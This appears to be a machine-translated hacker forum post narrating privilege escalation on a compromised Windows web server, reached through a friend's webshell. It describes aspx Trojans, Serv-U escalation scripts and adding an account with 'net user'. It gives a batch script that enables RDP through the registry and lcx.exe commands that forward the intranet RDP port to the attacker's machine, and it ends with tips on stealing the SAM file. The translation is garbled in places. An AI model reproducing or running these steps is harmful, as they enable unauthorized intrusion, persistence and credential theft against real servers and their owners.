One elevation of permission for hyrz

Today, my friend lost a webshell and asked me to raise his right. After getting the password, my friend said that the drive D can be viewed. after entering the drive D, I can see many sensitive directories; 1.

 

I personally have a habit. Every time I get webshell, I have to check that the branch does not support ASP. NET. I think it generally has a higher permission than asp, which may be an omission of management. If you have uploaded An aspx Trojan, you can use the built-in port scanning tool to scan the lower ports. Ports 1433 and 43958 are enabled. Haha! There is hope! In order not to go forward and look for the sa password, haha! I have not tried to raise the permission. I used the tool provided by dama.com to check the number of sites under iis. Only two sites are available. I think it must not be a virtual space. After opening the conn. asp file under the root directory of the website, I almost did not faint !! The access database is used. It seems that sa is disconnected. What should I do if I cannot get through? Of course, keep going! Think that the server has also installed serv-u, so find the su shortcut in the C: Documents and SettingsAll Users "start" Menu \ Program Serv-U path; 2
 

(You can also refer to this method later). After opening it in text mode, I found the su installation path! Su is on disk D! Haha, there's finally hope! After finding the su directory, check whether the ServUDaemon. ini file can be edited. After you press a few letters and press enter, the system prompts you are not authorized. I have long anticipated this kind of thing! But I am still a little scared. I am afraid that I will lose my hero's demeanor .. It seems that we want to download the ServUDaemon. ini file and modify it. Because su is not installed on the computer, all the files will be downloaded. Open a view and register. Open Baidu and search for the cracked version !~~~~ (> _ Administrator account. The directory is set to drive C... After some modifications, it became the most memorable memories of my life... Do you know? Isn't it editable just now? What can I do to modify it ?? Inverted... My heart is almost reaching the realm of despair! I have read a lot of tutorials from my predecessors. Of course, I have made a shift. I did not prompt to enter the password when I opened the su command. It indicates that it is the default SU account. At this moment, the fire in my heart finally burns up! I found the Elevation of Privilege scripts of Lake2 and GoldSun in the garbage bin of my computer. After the script was uploaded, my hands kept shaking and I wondered if it would succeed ?? If it fails, everything will end? Open the Privilege Escalation script, set it at will, and click Add. A prompt is displayed, indicating that the permission is successfully added. Input "net user" in mongoshell, And the echo results make me dizzy. It seems that I am doomed to fail !!! ECHO does not have my holy account. Is it a question about Privilege Escalation scripts? Use the GoldSun script again. Click Add after opening, and the addition is displayed soon! Hit "net user" in mongoshell again!

It seems that a chicken cannot be eaten in front of me... I cleaned up the battlefield, but I still couldn't go through it. It's all about am, and I'm not sleepy at all. Maybe it's all about webshell. I'm not reconciled .... I visited webshell casually and clicked here. Then I found that my aspx big Mali has a su exp3, enter "net user XXX/add" in the cmd column, and click "add". A lot of information will be displayed immediately! Pull the scroll bar to the end, and there is a piece of information for me to enjoy the day; 4 and 5. In order to verify whether the addition is successful, I typed "net user"; 6 in mongoshell.
Figure 3:

 

Figure 4:

 

Figure 5:

 

Figure 6:

 

It seems that it has been added successfully! Failed. When I refreshed the page, I found that it was not opened. It seems that it has taken effect! In order to let my small mind get washed away, by the way, I went to the Internet to see MM in a short time.

A moment later, I opened webshell again and can access it. I used the built-in port scanning tool again to scan and found that it was not enabled. Why ?? Dizzy... It seems that I want to ask about Baidu. After a while, I found a 3389 bat file on the Internet. The Code is as follows:
Echo Windows Registry Editor Version 5.00> 3389.reg
Echo [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server]> 3389.reg
Echo "fDenyTSConnections" = dword: 00000000> 3389.reg
Echo [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal ServerWdsdpwdTdscp]> 3389.reg
Echo "PortNumber" = dword: 00000d3d> 3389.reg
Echo [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal ServerWinStationsRDP-Tcp]> 3389.reg
Echo "PortNumber" = dword: 00000d3d> 3389.reg
Regedit/s 3389.reg
Del 3389. reg: copy the code to the server and run it. port 3389 is enabled! Exciting ing! Think of a simple script named 3389.exe, and do not restart, it is really concave enough... In mongoshell, press "ipconfig" and press Enter. What should I do if I find it is Intranet ?? Even if 3389 is enabled, it is not necessarily connected, and the ip address of webshell also shows the Intranet IP address (7). I haven't seen it yet. I'm dizzy! I think the Intranet IP address is everywhere... The last time I read a tutorial called port forwarding, the tutorial is very simple! I suggest you take a look.
Figure 7:

 


Run the "D: dotComDemoinclcx.exe-slave local public ip 51 destination local ip 3389 "(Brief Introduction: (forward port 3389 of the target ip to port 51 of the local host); 8;
Figure 8:

 
Then run "lcx.exe-listen 51 880" on the local machine (Brief Introduction: listen to port 51 on the local machine and open port 3389 forwarded by the target host to port 880 on the local machine)
Then use mstsc to connect to port 880 (127.0.0.1: 880) of the local machine. Remember to write the absolute path if lcx does not use the current directory. Inverted! The local lcx.exe does not display back. (: 9) it is executed again in the mongoshell. The local lcx is still not displayed! Fail? I thought, sometimes it may not show back. Open mstsc connection "127.0.0.1: 880", haha! Connected! 10. Enter the account you just added. The connection is successful! 11. Haha. Now the Elevation of Privilege is over!
Figure 9:

 


Figure 10:

 

Figure 11:

 

However, I still have some experience to share with you! If you get webshell, you can see that the support does not support ASP. NET (aspx). If it is supported, it may give you a good harvest! Some other black friends complain that the sam file cannot be downloaded or copied. I can download it with the php Trojan before. You can try it! The younger brother's text writing is a little poor. I will take a look at it if I can. If you have any questions, add Q: 345432349. Do not ask me for help. We can share them with you!